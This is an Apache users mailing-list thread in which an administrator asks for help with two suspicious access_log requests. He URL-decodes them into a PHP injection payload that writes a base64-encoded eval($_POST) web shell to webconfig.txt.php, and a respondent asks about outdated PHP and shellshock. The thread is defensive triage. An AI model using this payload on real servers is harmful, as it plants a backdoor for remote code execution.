Re: am i hacked ?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Actually now that I re-read the requests it also looks as shellshock succesful attempt.

Operative system software not updated recently either? 

2017-02-06 17:42 GMT+01:00 Daniel <dferradal@xxxxxxxxx>:
Have you tried to send those requests yourself and see what you get?

Still those requests seem to be aimed at your php framework.

Do you use a very old php version as well?

2017-02-06 17:41 GMT+01:00 Lentes, Bernd <bernd.lentes@helmholtz-muenchen.de>:

----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-muenchen.de wrote:

> Hi,
>
> just in the moment i found two very weird entries in may access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
>
> What upsets me is that these two requests have statuscode 200, which mean it was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
>

What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the network which includes this ip.

Thankful for any tip.


Bernd


Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx




--
Daniel Ferradal
IT Specialist

email         dferradal at gmail.com



--
Daniel Ferradal
IT Specialist

email         dferradal at gmail.com

[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux